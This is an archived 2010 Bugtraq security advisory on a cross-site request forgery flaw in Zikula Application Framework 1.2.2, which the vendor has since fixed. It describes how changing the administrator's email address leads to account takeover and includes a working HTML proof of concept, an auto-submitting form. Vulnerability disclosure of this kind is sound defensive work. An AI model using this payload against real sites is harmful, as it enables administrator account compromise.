lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 4 May 2010 14:41:18 +0200 (CEST)
From: advisory@...ridge.ch
To: bugtraq@...urityfocus.com
Subject: XSRF (CSRF) in Zikula Application Framework

Vulnerability ID: HTB22351
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_zikula_application_framework.html
Product: Zikula Application Framework
Vendor: Zikula Software Foundation
Vulnerable Version: 1.2.2 and Probably Prior Versions
Vendor Notification: 19 April 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Fixed by Vendor
Risk level: Low 
Credit: High-Tech Bridge SA (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "users" module to properly verify the source of HTTP request. 

User can perform CSRF attack and change the email of administrator. Then the user can use the password reminder system and get the administrator password on this email address.

Successful exploitation of this vulnerability could result in a compromise of the application, modification of sensitive data. 

Attacker can use browser to exploit this vulnerability. The following PoC is available: 


<form method="POST" action="http://host/index.php?module=users&func=updateemail" name="main">
<input type="hidden" name="newemail" value="test@...t.com">
<input type="hidden" name="submit" value="">
</form>
<script>
document.main.submit();
</script>


Solution: Upgrade to the most recent verison

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ